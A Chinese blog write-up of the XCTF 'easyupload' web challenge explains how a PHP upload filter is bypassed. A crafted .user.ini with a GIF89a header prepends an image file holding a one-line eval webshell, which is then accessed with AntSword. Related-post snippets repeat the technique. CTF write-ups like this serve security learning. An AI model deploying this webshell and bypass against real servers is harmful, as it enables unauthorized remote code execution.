攻防世界-Web-新手-easyupload

最新推荐文章于 2024-06-30 09:33:41 发布
最新推荐文章于 2024-06-30 09:33:41 发布
阅读量233 收藏 4
点赞数 1
分类专栏: ctf-攻防世界 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45653478/article/details/136855453
版权

题目描述

一名合格的黑客眼中,所有的上传点都是开发者留下的后门

靶场环境

解题思路

1 判断只能上传图片格式的话

2 那只能通过其他漏洞来图片解释

3 查看别人解题思路,原来是利用php的user.ini配置文件来实现漏洞攻击

php的 user.ini 配置文件里,有一个参数是在文件运行前把某个文件包含进来的

GIF89a                  
auto_prepend_file=图片

骤一:准备文件 准备 .user.ini 文件,这里的GIF89a是用来绕过防御三(看上面)

GIF89a    
auto_prepend_file=s.jpg

准备 s.jpg 文件,这里取消用 <?php ?>

采用了短标签写法,php7.0之后弃用,7.4好像就取消了,所以这题应该是php5

GIF89a
<?=eval($_REQUEST['cmd']);?>

抓包

上传.user.ini

在上传s.jpg

按f12查看文件去向

蚁剑链接

查看flag文件

得到flag:flag{B14ck_L1st_1s_S0_D4ng3r0us}

这个flag不是解题的falg,查看了官方的解题思路,发现也是这个flag文件,但flag不是这个flag

乐队1
关注
专栏目录
【网络安全 | CTF】攻防世界 easyupload详析
等风来
07-31 8242
抓包改后缀,.php1~.php9、.htaccess均被过滤(.htaccess 文件是一个用于配置 Apache Web 服务器的配置文件。它通常位于网站根目录或特定目录中,用来为该目录及其子目录提供特定的配置指令):提示:只要是运用了fastcgi的服务器都能够利用该方式getshell,不论是apache或者ngnix或是其他服务器。
攻防世界-WEB进阶-ics-06(Burpsuite爆破使用)
m0_46267075的博客
05-26 4623
尝试
攻防世界--easyupload
qq_73611185的博客
09-16 865
php文件发现网页设置了文件类型检测,修改文件后缀为jpg依然无效,第二步,尝试去burpsuite改包,将一句话木马文件上传后的cotent-type改为image/jpg,然后放包,仍然无法上传成功(burpsuite改包之后把拦截请求关了就是放包)然后同理第二步,上传成功之后再上传一个jpg文件(命名与上面的jpg文件保持一致否则会导致连接失败),文件内容为:(没有结尾那个v,懒得删除了)还有一个不能上传文件成功的原因很离谱就是:不能使用校园网进行上传(学生党的痛)成为ctf全栈之路之web第十
攻防世界Web新手 easyupload
qq_52481261的博客
06-13 774
思考理解是不是有什么东西被识别出来了,有可能是文件中的命令被识别了,并且文件是根据txt改写的有可能识别出来不是图片,因此将命令中的‘php’删除并且加上一个GIF89a的图片头表明这是一张图片。文件允许用户在其网站或应用程序的根目录下设置特定的 PHP 配置选项,这些选项会影响到该目录及其子目录中运行的 PHP 脚本。当你在计算机中打开一个 GIF 文件时,文件的开头通常会以 "GIF89a" 开始,这个标识符告诉解析程序这是一个符合 GIF 格式规范的文件,并且使用的是 "89a" 版本的格式。
攻防世界web-----easyupload
2201_75556700的博客
01-02 710
这道对小白的我来说还是很难的,做出这道我也是看了很多的解答后自己重新试了一遍(我是在window下进行的,在kali稍微有点不一样,就是那个.user.ini得改为user.ini之后再在抓包那里修改为.user.ini就好了(就是第二步))之所以有点不一样是因为kali中"."开头会隐藏。1.首先我们需要上传两个文件,一个是.user.ini另一个是a.jpg(a可以随意命名)2.接下来先上传.user.ini文件之后用burp抓包。3.然后再上传a.jpg文件。.user.ini的内容为。
攻防世界easyuploadweb新手
yuanxu8877的博客
11-27 4463
攻防世界easyuploadweb新手),目现在越来越好了
攻防世界Training-Stegano-1
10-31
【标】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
攻防世界--WEB进阶--Web_python_template_injection
m0_46267075的博客
05-28 1195
好难啊
攻防世界-- web新手练习区-- writeup汇总
yisosooo的博客
09-22 2465
一篇帖子包含所有目。 第一-- view_source 目提示:鼠标右键好像不管用了。鼠标右键的主要功能之一是选取网易源代码选项,所以可以F12来查看源代码。即可得到flag。 第二-- get_post 目提示:HTTP通常使用两种请求方法。HTTP通常使用两种请求方法为GET和POST. 第一步:请用GET方式提交一个名为a,值为1的变量,构造URL:http://111....
2021-06-24CTF-攻防世界-WEB新手练习区(12入门
u258710的博客
06-24 2629
CTF-攻防世界-WEB新手练习区(12入门)01-view_source02-robots03-backup04-cookie05-disabled_button06-weak_auth07-simple_php08-get_post09-xff_referer10-webshell11-command_execution12-simple_js 01-view_source 目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 目提示查看网页源代码,但鼠标右键不管用
攻防世界 easyupload
rev1ve的博客
03-09 672
ctf攻防世界 easyupload web
Easyupload攻防世界
最新发布
xyh000001的博客
06-30 501
然后就可以开始找flag,当然你也可以一开始就把muma.jpg里的代码改成cat,直接抓取flag,还省的自己找。把Content-Type: application/octet-stream改成。我打/直接拉到最下面有flag点进去就是答案了。上传a.jpg这样才算成功(如图)。1.新建.user.ini文件。用蚁剑连接(每个人的都不一样)上传上面的文件用BURP抓包。新建a.txt文件,内容为。保存后把文件名改成.jpg。F12打开网络找到网址。
攻防世界easyupload
m0_73303597的博客
11-10 460
自用
攻防世界easyupload
小缪的博客
06-10 3463
知识点:文件上传漏洞。
easyupload(攻防世界)
m0_56107268的博客
11-15 8629
.user.ini 学习
[攻防世界] easyupload
m0_75178803的博客
04-02 649
首先准备 .user.ini 文件和a.jpg文件。首先上传.user.ini文件,然后进行抓包。1.[攻防世界] easyupload。用蚁剑连接该页面,连接密码为木马密码。.user.ini 文件上传成功。此时再将a.jpg文件上传成功。在根目录下得到flag。
攻防世界-easyupload
m0_62094846的博客
10-10 2917
上传php文件不行, 修改Content-Type: image/jpeg也不行,把文件名改成jpg才可以,还有头文件也有验证,也要改(这里直接上传正常的jpg文件比较好)然后可以上传成功,但是试过文件名的各种绕过形式,都不能把php上传,就算上传了也不能在蚁剑上读取。这个系统是windows,用user.ini试试(user.ini:把文件当作php文件解析)(index.php是uploads下的php文件,用它读取5.jpg下的文件)然后输入木马,这里尝试过后php也是被过滤的,用缩减版。
easyupload-CTF-攻防世界
szhangliwenya的博客
03-20 668
user.ini文件是php.ini的补充文件,当网页访问的时候就会自动查看当前目录下是否有.user.ini,然后将其补充进php.ini,并作为cgi的启动项。如果你的连接路径是http://x.x.x.x:端口/uploads/shell.jpg这样的话,是不对的。正确的连接url地址应为http://x.x.x.x:端口/uploads/index.php (请回想.user.ini文件及auto_prepend_file方法)左上角文件另存为.user.ini文件 后上传。
攻防世界-WEB-easyupload
Lucifer的专栏
09-11 555
2.上传该文件,并用burp抓包,将Content-Type: application/octet-stream修改为。如图所示上传地址为:****/uploads/index.php。PS:按F12打开调试器选择网络查看上传文件的地址。1.新建.user.ini文件,内容如下。4. 新建a.txt文件,内容为。保存后将文件后缀修改为.jpg。5.直接上传该文件即可成功上传。
攻防世界fileinclude
10-10
攻防世界的fileinclude目是一个常见的Web安全目,主要考察文件包含漏洞。文件包含漏洞是指在Web应用中,未对用户输入进行充分的过滤或验证,导致攻击者可以通过构造恶意的文件路径或文件名,来读取或执行本不应被访问的文件。 针对这个目,我们需要先观察目给出的代码,然后尝试找到漏洞点并进行利用。 在解过程中,一般会根据提示,访问给出的URL,并观察URL中的参数。如果URL中包含了可控制的参数,并且该参数未经过充分的过滤或验证,那么有可能存在文件包含漏洞。我们可以尝试通过修改参数的值来构造恶意的文件路径或文件名。 常见的利用方法有: 1. 直接读取敏感文件:通过构造合适的文件路径,可以读取服务器上的敏感文件,如配置文件、源代码等。 2. 通过包含远程文件执行恶意代码:如果服务器上允许包含远程文件,并且攻击者能够控制远程文件的内容,那么可以通过包含远程文件来执行恶意代码。 具体的解过程会根据目提供的具体情况而有所不同,你可以提供具体的文件包含目,我可以为你提供更详细的解答。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值